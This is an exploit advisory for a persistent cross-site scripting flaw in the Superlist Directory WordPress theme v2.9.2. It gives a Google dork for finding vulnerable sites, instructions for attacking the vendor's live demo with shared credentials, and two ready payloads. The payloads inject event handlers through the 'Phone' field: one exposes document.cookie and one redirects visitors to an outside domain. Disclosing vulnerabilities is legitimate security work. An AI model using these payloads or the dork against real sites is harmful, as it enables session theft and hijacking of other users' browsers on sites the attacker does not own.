# Exploit Title: Superlist - Directory WordPress Theme v2.9.2 Persistent XSS # Google Dork: /wp-content/themes/superlist/ # Date: 02/12/2019 # Exploit Author: SUBVΞRSΛ # Vendor Homepage: https://byaviators.com/en/ # Software Link: https://themeforest.net/item/superlist-directory-wordpress-theme/13507181 # Version: 2.9.2 [ 2.880 Sales ] # Tested on: Parrot OS # CVE : - # CWE : 79 ----[]- Persistent XSS: -[]---- You need a new basic user account (register your own here https://superlist.byaviators.com/create/?type=job or use mine: subversa/subversa), then go to the https://superlist.byaviators.com/create/?type=job&step=contact page for new listing submit right on the «Contact» step. You'll see the vulnerable input fields, f.e. «Phone». Use payload like provided below and save your listing. The point is, you need to «break» the «Phone» <a> tag and inject desired payload inside it. All data from the form steps is stored as a cookie. Payload Sample #0: " /onmouseover="alert(document.cookie);" /onauxclick="alert(document.domain);" Payload Sample #1: " /onmouseover="console.log(`SUBVΞRSΛ`);" /onauxclick="alert(`PoC`);window.location.replace(`http://defcon.su`);"